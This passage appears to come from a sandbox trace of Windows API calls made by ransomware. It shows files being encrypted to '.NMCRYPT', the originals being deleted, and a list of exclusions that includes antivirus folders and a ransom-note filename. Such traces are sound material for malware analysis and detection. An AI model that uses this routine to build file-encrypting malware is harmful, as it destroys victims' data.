[0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.366] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.367] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.367] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0163.367] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.367] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1f8) returned 1 [0163.367] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.367] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.367] wcslen (_String="\\\\?\\") returned 0x4 [0163.367] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad6b8) returned 1 [0163.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.368] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=237) returned 1 [0163.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.368] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xed, lpOverlapped=0x0) returned 1 [0163.369] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xed, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0163.369] GetLastError () returned 0x0 [0163.369] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0163.424] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.424] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0163.424] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x20) returned 0 [0163.424] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 1 [0163.424] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0 [0163.425] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" [0163.425] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.425] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1d1.tmp")) returned 0xf1d1 [0163.426] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1d1.tmp"), dwFlags=0x1) returned 0 [0163.426] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1D1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1d1.tmp")) returned 1 [0163.427] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0163.427] wcslen (_String="OK") returned 0x2 [0163.427] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.427] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.427] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0163.427] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0163.427] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0163.427] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*NMCRYPT") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*Recovers your files.html") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.exe") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.dll") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.lnk") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.bat") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.ini") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.msi") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*.scf") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*pagefile.sys*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*AppData*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\winrar\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\java\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\windows\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\ESET\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\AVG\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0163.427] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*Atheros*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*Realtek*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*bootmgr*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*boot*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*boot*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*IO.SYS*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*ntldr*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*chrome*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*opera*") returned 0 [0163.428] PathMatchSpecW (pszFile="GreenBubbles.jpg", pszSpec="*firefox*") returned 0 [0163.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", pszSpec="*") returned 1 [0163.428] strlen (_Str="NMoreira") returned 0x8 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.429] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] 